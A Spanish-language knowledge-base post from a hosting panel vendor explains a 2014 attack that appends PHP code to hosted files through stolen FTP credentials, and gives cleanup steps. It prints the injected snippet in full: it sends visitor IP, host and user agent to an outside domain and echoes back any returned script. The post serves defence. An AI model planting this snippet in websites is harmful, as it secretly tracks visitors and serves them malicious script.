Blog

Archive for enero, 2014

KB: 21012014-001: Solucionado el ataque php-hash-update en alojamientos

Síntomas

Core-Admin le ha informado de cambios no permitidos en los ficheros de alojamientos y revisándolos, encuentra que los ficheros fueron actualizados con algo como:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) &amp;&amp; !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&amp;referer=".urlencode($_SERVER['HTTP_HOST'])."&amp;ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Revisiones afectadas

Todas

Trasfondo

Esta ataque es realizado a través del servidor FTP, descargando el fichero original para actualizarlo con el contenido adicional. En esencia, el ataque busca añadir contenido a sus ficheros dejando el resto como estaba.

Esta ataque es posible por la clave fue robada de un equipo comprometido que tiene algún virus o un malware que busca por contraseñas almacenadas en localizaciones conocidas o porque una sesión FTP fue iniciada usando estas contraseñas utilizando una conexión no segura (como una wifi pública).

Solución

Tiene que encontrar los ficheros que fueron actualizados para borrar el contenido adicional. También tiene que resetear la contraseña de las cuentas FTP que fueron usadas para este ataque. Afortunadamente, Core-Admin ya incluye una herramienta que automatiza estas tareas.

Siga las siguientes instrucciones para limpiar y resetear todas las cuentas FTP requeridas:

  1. Ejecute el siguiente comando como root en una shell del servidor:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Una vez termine, la herramienta informará cuales fueron los ficheros actualizados y qué cuentas FTP fueron comprometidas. Ahora, ejecute la herramienta de nuevo pidiéndola que corrija el problema:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts

Posted in: KB, Seguridad

Leave a Comment (0) →